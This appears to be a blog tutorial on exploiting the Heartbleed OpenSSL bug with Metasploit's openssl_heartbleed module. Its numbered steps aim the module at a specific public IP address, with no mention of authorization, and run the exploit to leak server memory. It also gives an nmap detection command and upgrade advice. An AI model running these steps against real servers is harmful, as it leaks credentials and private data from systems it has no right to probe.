How to Exploit Heartbleed using Metasploit in Kali Linux

Heartbleed vulnerability (registered as CVE-2014-0160) is a security bug present in the older version of OpenSSL cryptographic library. OpenSSL is a cryptographic toolkit used to implement the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. Heartbleed bug in OpenSSL discovered in 2012 while in 2014 it was publicly disclosed.This article discusses the steps to exploit heartbleed vulnerability.

There were around half a million of web servers claimed to be secure and trusted by a certified authority, were believed to be compromised because of this vulnerability. This bug allowed attackers to access sensitive information present on web servers even though servers using TLS secure communication link, because the vulnerability was not in TLS but in its OpenSSL implementation.

How it works?

Heartbleed vulnerability

To understand how Heartbleed vulnerability works, first we need to understand how SSL/TLS works. While communicating over SSL/TLS protocol there is a term that is called ‘Heartbeat’, a request message consists of a payload along with the length of the payload i.e. a 16-bit integer. Heartbeat request message let the two communicating computers know about their connection that they are still connected even if the user is not uploading or downloading anything at that time.

Now let’s say a client sends a Heartbeat request to the server saying send me the four letter word ‘bird’. This message in encrypted form received by the server and then server acknowledges the request by sending back the exact same encrypted piece of data i.e. ‘bird’. This Heartbeat message request includes information about its own length. Now in the malicious usage scenario the client sends the request by saying send me the word ‘bird’ consisting of 500 letters. This let the server to store more in memory buffer based on the reported length of the requested message and sends him back more information present on the web server. The attacker can perform this attack many times to extract the useful information including login credentials.

Heartbleed Exploit Demo

In this demo I will demonstrate a simple exploit of how an attacker can compromise the server by using Kali Linux.

Step01: Install Metasploit to use latest auxiliary module for Heartbleed

#apt install metasploit-framework

Install Metasploit to use latest auxiliary module for Heartbleed

Be patient as it will take some time, I have already installed the framework here, after installation is completed you will be back to the Kali prompt.

Step02: Start the Metasploit console

#msfconsole

Start the Metasploit console

Step03: Search Heartbleed module by using built in search feature in Metasploit framework, select the first auxiliary module which I highlighted

#search heartbleed

earch Heartbleed module by using built in search feature in Metasploit framework, select the first auxiliary module which I highlighted

Step04: Load the heartbleed by module by the command

#use auxiliary/scanner/ssl/openssl_heartbleed

load the heartbleed by module by the command

Step05: After loading the auxiliary module, extract the info page to reveal the options to set the target

#info

After loading the auxiliary module, extract the info page to reveal the options to set the target

Step06: we need to set the parameter RHOSTS to a target website which needs to be attacked

#set RHOSTS 86.104.176.22

we need to set the parameter RHOSTS to a target website which needs to be attacked

Step07: To get the verbose output and see what will happen when I attack the target, enable verbose

#set VERBOSE true

To get the verbose output and see what will happen when I attack the target, enable verbose

Step08: Finally attack the target by typing command:

#exploit

Finally attack the target by typing command

Finally attack the target by typing command1

The target system has successfully leaked some random information. In this way attacker can perform this procedure again and again to extract the useful information because he has no control over its location and cannot choose the desired content, every time you repeat this process different data can be extracted.

There are many tools that will show if the website is still vulnerable to Heartbleed attack. In our case we have checked the vulnerability by using Nmap tool

Simply type #nmap –p 443 –script ssl-heartbleed [Target’s IP]

target system is using old version It shows that the target system is using old version of OpenSSL and had vulnerability to be exploited.

Heartbleed is still present in many of web servers which are not upgraded to the patched version of OpenSSL. The way to fix this vulnerability is to upgrade the latest version of OpenSSL. The affected versions of OpenSSL are from 1.0.1 to 1.0.1f. Try to avoid using these versions.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Top Suggestions To Minimize Cyber Attack Risks

The Cyber Protection and Cyber Attack definition play an important role in maintaining both global security and operational productivity due to the rapid proliferation...

Policing the Dark Web (TOR): How Authorities track People on Darknet

The darknet, especially the TOR network, can be hacked, or the information of the people using it can be extracted in the plain text....

Best VPNs for Android – and Why You Need One Now

Most people protect their laptops and computers from potential cyber-attacks but only consider the cybersecurity of their mobile devices when it’s too late. In recent...

The Levels of the Internet Surface Web, Deep Web, and Dark Web

The internet, invented by Vinton Cerf and Bob Cahn, has evolved since its creation in the 1960s. In 1990, the World Wide Web transformed...

LOOKING FOR HACKING RECIPES FORM THE PRO?

Then sign up for FREE to the ehacking’s exclusive group. You will get the exclusive tips/tricks, tutorials, webinars & courses that I ONLY share with my fellow on this exclusive newsletter.